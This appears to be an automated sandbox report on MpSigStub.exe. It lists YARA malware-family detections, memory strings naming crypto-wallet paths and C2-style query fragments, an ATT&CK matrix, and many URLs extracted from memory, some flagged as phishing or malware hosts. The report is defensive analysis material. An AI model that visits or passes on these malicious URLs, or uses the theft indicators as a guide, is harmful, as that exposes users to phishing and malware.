Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Nukesped

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Dorkbot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: wallet.datelectrum.dat
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: exodus.exe
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: 1Minimal configuration file for Ethereum mining is
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Remote Access Functionality:

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected NetWire RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Detected Imminent RAT

Show sources

Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp

String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb

Yara detected Hancitor

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Detected HawkEye Rat

Show sources

Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger]

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Nukesped

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp

String found in binary or memory: Remcos_Mutex_Inj

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Dorkbot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp

String found in binary or memory: RFB 003.008

Source: Yara match	File source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp	String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Command and Scripting Interpreter1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Remote Access Software5	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact2
Default Accounts	Scheduled Task/Job	Windows Service1	Windows Service1	Software Packing1	Credential API Hooking1	Peripheral Device Discovery1	Replication Through Removable Media1	Data from Local System1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection2	Timestomp1	Input Capture21	File and Directory Discovery1	SMB/Windows Admin Shares	Credential API Hooking1	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Proxy1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion11	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading3	Cached Domain Credentials	Security Software Discovery121	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection2	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Users1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpClient.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
36.3.MpSigStub.exe.197a3f84db6.63.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a378e45a.139.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a4734ab6.49.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
36.3.MpSigStub.exe.197a4673aed.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a46aeebe.25.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a497a30f.132.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a31af2c4.73.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a45c0136.172.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a45c0136.47.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a46f017a.26.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a31aed77.165.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a46f017a.58.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a3f84db6.95.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a46aeebe.14.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a31aed77.74.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a357b147.154.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a31ae82a.75.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a31eb36e.135.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a45c0136.31.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a32a3acd.179.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a3f84db6.208.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.3.MpSigStub.exe.197a31ae82a.166.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a3578ac5.153.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.3.MpSigStub.exe.197a31af2c4.167.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://kiranacorp.com/oja	1%	Virustotal		Browse
http://kiranacorp.com/oja	0%	Avira URL Cloud	safe
http://www.bonusesfound.ml/update/index.php	13%	Virustotal		Browse
http://www.bonusesfound.ml/update/index.php	0%	Avira URL Cloud	safe
http://www.cooctdlfast.com/download.php?	3%	Virustotal		Browse
http://www.cooctdlfast.com/download.php?	0%	Avira URL Cloud	safe
http://110.42.4.180:	13%	Virustotal		Browse
http://110.42.4.180:	0%	Avira URL Cloud	safe
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	0%	Avira URL Cloud	safe
http://minetopsforums.ru/new_link3.php?site=	0%	Avira URL Cloud	safe
http://today-friday.cn/maran/sejvan/get.php	0%	Avira URL Cloud	safe
http://ati.vn	0%	Avira URL Cloud	safe
http://errors.statsmyapp.comxa	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://185.172.110.217/robx/remit.jpg	0%	Avira URL Cloud	safe
https://anonfiles.com/	0%	Avira URL Cloud	safe
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	0%	Avira URL Cloud	safe
https://sumnermail.org/sumnerscools/school.php	0%	Avira URL Cloud	safe
http://139.162.	0%	Avira URL Cloud	safe
http://rghost.net/download/	0%	Avira URL Cloud	safe
http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x	0%	Avira URL Cloud	safe
http://install.outbrowse.com/logTrack.php?x	0%	Avira URL Cloud	safe
http://usa-national.info/gpu/band/grumble.dot	0%	Avira URL Cloud	safe
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	0%	Avira URL Cloud	safe
http://canonicalizer.ucsuri.tcs/3	0%	Avira URL Cloud	safe
http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=	0%	Avira URL Cloud	safe
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	0%	Avira URL Cloud	safe
http://spywaresoftstop.com/load.php?adv=141	0%	Avira URL Cloud	safe
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	0%	Avira URL Cloud	safe
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	0%	Avira URL Cloud	safe
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	0%	Avira URL Cloud	safe
https://sweetsizing.com/vip/	0%	Avira URL Cloud	safe
http://5.149.248.85/flashupdate.exe	0%	Avira URL Cloud	safe
http://security-updater.com/binaries/	0%	Avira URL Cloud	safe
http://www.fbcom.review/d/9.doc	0%	Avira URL Cloud	safe
http://5starvideos.com/main/K5	0%	Avira URL Cloud	safe
http://aklick.info/d.php?date=	0%	Avira URL Cloud	safe
http://77.81.225.138/carnaval2017.zip	0%	Avira URL Cloud	safe
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	0%	Avira URL Cloud	safe
https://go.wikitextbooks.info	0%	Avira URL Cloud	safe
https://bemojo.com/ds/161120.gif	0%	Avira URL Cloud	safe
http://esiglass.it/glassclass/glass.php	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://rotf.lol/3u6d9443	0%	Avira URL Cloud	safe
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	0%	Avira URL Cloud	safe
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	0%	Avira URL Cloud	safe
http://www.niepicowane.pl/	0%	Avira URL Cloud	safe
http://office-service-secs.com/blm.task	0%	Avira URL Cloud	safe
https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php	0%	Avira URL Cloud	safe
http://js.f4321y.com/	0%	Avira URL Cloud	safe
http://www.searchmaid.com/	0%	Avira URL Cloud	safe
http://tbapi.search.ask.comxb	0%	Avira URL Cloud	safe
http://www.mva.by/tags/ariscanin1.e	0%	Avira URL Cloud	safe
http://masgiO.info/cd/cd.php?id=%s&ver=g	0%	Avira URL Cloud	safe
http://sds.clrsch.com/x	0%	Avira URL Cloud	safe
https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	100%	Avira URL Cloud	phishing
http://boscumix.com/optima/index.php	0%	Avira URL Cloud	safe
http://playsong.mediasongplayer.com/	0%	Avira URL Cloud	safe
http://207.154.225.82/report.json?type=mail&u=$muser&c=	0%	Avira URL Cloud	safe
http://www.xiuzhe.com/ddvan.exe	0%	Avira URL Cloud	safe
http://t.zer9g.com/	0%	Avira URL Cloud	safe
http://149.3.170.235/qw-fad/	0%	Avira URL Cloud	safe
http://maringareservas.com.br/queda/index.php	0%	Avira URL Cloud	safe
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	100%	Avira URL Cloud	malware
http://seunelson.com.br/js/content.xml	0%	Avira URL Cloud	safe
http://costacars.es/ico/ortodox.php	100%	Avira URL Cloud	malware
http://82.98.235.	0%	Avira URL Cloud	safe
http://verred.net/?1309921	0%	Avira URL Cloud	safe
https://pigeonious.com/img/	0%	Avira URL Cloud	safe
http://data1.yoou8.com/	0%	Avira URL Cloud	safe
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	0%	Avira URL Cloud	safe
http://handjobheats.com/xgi-bin/q.php	0%	Avira URL Cloud	safe
http://www.pcpurifier.com/buynow/?	0%	Avira URL Cloud	safe
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	0%	Avira URL Cloud	safe
https://longurl.in/tllwu	0%	Avira URL Cloud	safe
http://%63%61%39%78%2e%63%6f%6d/ken.gif	0%	Avira URL Cloud	safe
https://cdn4.buysellads.net/pub/tempmail.js?	0%	Avira URL Cloud	safe
http://www.mybrowserbar.com/cgi/coupons.cgi/	0%	Avira URL Cloud	safe
http://200.159.128.	0%	Avira URL Cloud	safe
http://psynergi.dk/data	0%	Avira URL Cloud	safe
http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
edge-web.dual-gslb.spotify.com	35.186.224.25	true	false		high
spclient.wg.spotify.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://kiranacorp.com/oja	MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bonusesfound.ml/update/index.php	MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cooctdlfast.com/download.php?	MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://110.42.4.180:	MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://minetopsforums.ru/new_link3.php?site=	MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://today-friday.cn/maran/sejvan/get.php	MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ati.vn	MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://errors.statsmyapp.comxa	MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.110.217/robx/remit.jpg	MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/	MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sumnermail.org/sumnerscools/school.php	MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://139.162.	MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://rghost.net/download/	MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/	MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	false		high
http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x	MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://install.outbrowse.com/logTrack.php?x	MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://usa-national.info/gpu/band/grumble.dot	MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://akrilikkapak.blogspot.com/	MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	false		high
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://canonicalizer.ucsuri.tcs/3	MpSigStub.exe, 00000024.00000003.6298673850.00000197A43C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=	MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://actresswallpaperbollywood.blogspot.com/	MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	false		high
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://lo0oading.blogspot.com/	MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	false		high
http://www.youtube.com/watch?v=Vjp7vgj119s	MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	false		high
http://spywaresoftstop.com/load.php?adv=141	MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sweetsizing.com/vip/	MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tikotin.com	MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	false		high
http://5.149.248.85/flashupdate.exe	MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://security-updater.com/binaries/	MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fbcom.review/d/9.doc	MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
